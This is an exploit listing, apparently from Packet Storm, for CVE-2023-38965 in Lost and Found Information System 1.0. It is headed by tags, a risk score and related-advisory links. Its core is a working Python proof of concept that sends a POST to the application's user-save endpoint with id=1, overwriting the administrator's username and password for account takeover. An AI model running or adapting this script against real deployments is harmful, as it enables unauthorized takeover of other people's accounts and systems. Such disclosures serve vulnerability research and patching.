Lucene search
Or4nG.M4NPACKETSTORM:175077HistoryOct 12, 2023 - 12:00 a.m.
Lost And Found Information System 1.0 Insecure Direct Object Reference
2023-10-1200:00:00
Or4nG.M4N
packetstormsecurity.com
162
exploit
idor
account takeover
vulnerability
webapps
cve-2023-38965
python
request
response
exploit title
exploit author
category
target server
0.003 Low
EPSS
Percentile
69.7%
`# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965
Python p0c :
import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()
url = args.url + '/classes/Users.php?f=save'
data = {
'id': '1',
'firstname': 'or4ng',
'middlename': '',
'lastname': 'Admin',
'username': args.user,
'password': args.password
}
response = requests.post(url, data)
if b"1" in response.content:
print("Exploit ..")
time.sleep(1)
print("User :" + args.user + "\nPassword :" + args.password)
else:
print("Exploit Failed..")
`
Related
cvelist
cvelist
CVE-2023-38965
2023-11-03 00:00:00
prion
prion
Default credentials
2023-11-03 05:15:00
cve
cve
CVE-2023-38965
2023-11-03 05:15:29
nvd
nvd
CVE-2023-38965
2023-11-03 05:15:29
zdt
zdt
exploitdb
exploitdb
Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over
2024-02-13 00:00:00